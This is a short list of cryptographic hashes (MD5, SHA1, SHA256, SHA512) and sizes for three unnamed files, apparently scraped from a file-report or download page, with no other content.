SHA256: 0e9369af5430d970e568d31495d042e36a7f0f4d0c01303fd444372bc7946850
SHA512: a8b95d6912ae6fb4942a24b6aadb18d875b5ba38ec779f2fbe8227c62f9580df0ea856e6e3507a5c3279694f431d0c1791ab35331d197741b93ed4c90cefbfe5

Filesize: 15KB
MD5: d5129ceb34356797ee4592ade484f308
SHA1: 603405f89b7ac1f18c7fbdbcc64e490a43809219
SHA256: cdd9c0a823e8e20d2523be31ac4637088e6e518aac3fd2a6d5a622bd3ce45e67
SHA512: 6cd350d22f361eb401225154951cd597a1f1e10a9776305182b5c77cae6193c9da8e54b15c2beadaaedea75c70be34460396bf917d4286958915a0db3c6372ae

Filesize: 765KB
MD5: b4415b066e4dac6fb6849d0237bcdcf9
SHA1: d089566c069035f0f4ba147984d738114ba6ee90
SHA256: 3b30eb80b02910f592f5aa93e22af80b5e178785484e24b975892c0403073506
SHA512: 23291fbd5ff5e201209e9d034bbc87108b535cdec4a97b33e7934f974730eddecb4806d107518d1ec0a311d842a41b575eb8264d2ca23952c5337e97c0b4dc26

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82